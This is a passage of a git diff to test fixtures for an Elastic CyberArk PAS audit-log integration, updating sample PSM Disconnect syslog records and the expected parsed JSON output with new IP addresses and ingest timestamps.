Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:33:30Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:33:30\n 2021-03-15T10:33:30Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:33:30","IsoTimestamp":"2021-03-15T10:33:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:34:50Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:34:50\n 2021-03-15T10:34:50Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:34:50","IsoTimestamp":"2021-03-15T10:34:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T11:12:09Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 04:12:09\n 2021-03-15T11:12:09Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 04:12:09","IsoTimestamp":"2021-03-15T11:12:09Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T13:18:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:18:36\n 2021-03-15T13:18:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.13;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:18:36","IsoTimestamp":"2021-03-15T13:18:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.13;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T14:08:11Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:11\n 2021-03-15T14:08:11Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.13;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:11","IsoTimestamp":"2021-03-15T14:08:11Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.13;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T14:08:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:36\n 2021-03-15T14:08:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.13;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:36","IsoTimestamp":"2021-03-15T14:08:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.13;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-15T15:00:21Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 08:00:21\n 2021-03-15T15:00:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 08:00:21","IsoTimestamp":"2021-03-15T15:00:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615819476"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-302-psm-disconnect.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-302-psm-disconnect.log-expected.json index 831db67eb33..43602b598e1 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-302-psm-disconnect.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-302-psm-disconnect.log-expected.json @@ -84,7 +84,7 @@ "event": { "severity": 2, "duration": 7000000000, - "ingested": "2021-06-09T10:24:31.624781500Z", + "ingested": "2021-12-09T13:36:49.813714300Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eLinux\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\u003c/File\u003e\\n \u003cStation\u003e10.2.0.7\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:07;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"LINUX-SSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"admin2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"radiussrv.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMDisabled\\\" Value=\\\"No Reason\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Customer\\\" Value=\\\"Tesla\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"302\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Linux\",\"File\":\"Root\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\",\"Station\":\"10.2.0.7\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:07;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"LINUX-SSH\"},{\"Name\":\"UserName\",\"Value\":\"admin2\"},{\"Name\":\"Address\",\"Value\":\"radiussrv.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"CPMDisabled\",\"Value\":\"No Reason\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Customer\",\"Value\":\"Tesla\"}]}}}}", "code": "302", "kind": "event", @@ -108,20 +108,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -145,7 +136,7 @@ }, "@timestamp": "2021-03-11T17:38:26.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" @@ -157,15 +148,15 @@ ], "ip": [ "127.0.0.1", - "34.123.103.115", - "81.32.170.205" + "67.43.156.15", + "67.43.156.13" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-11T17:38:26Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:38:26\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:38:26Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:38:26\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:38:26Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Disconnect", "issuer": "Administrator", "extra_details": { @@ -178,21 +169,21 @@ "psmid": "PSMServer", "session_id": "87012dcc-8290-11eb-949e-080027efd402", "src_host": "127.0.0.1", - "dst_host": "34.123.103.115", + "dst_host": "67.43.156.15", "session_duration": "00:00:13" }, "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "PSM Disconnect", "timestamp": "Mar 11 09:38:26", "desc": "PSM Disconnect" @@ -204,8 +195,8 @@ "event": { "severity": 2, "duration": 13000000000, - "ingested": "2021-06-09T10:24:31.624794100Z", - "original": "\u003c5\u003e1 2021-03-11T17:38:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:26\",\"IsoTimestamp\":\"2021-03-11T17:38:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating 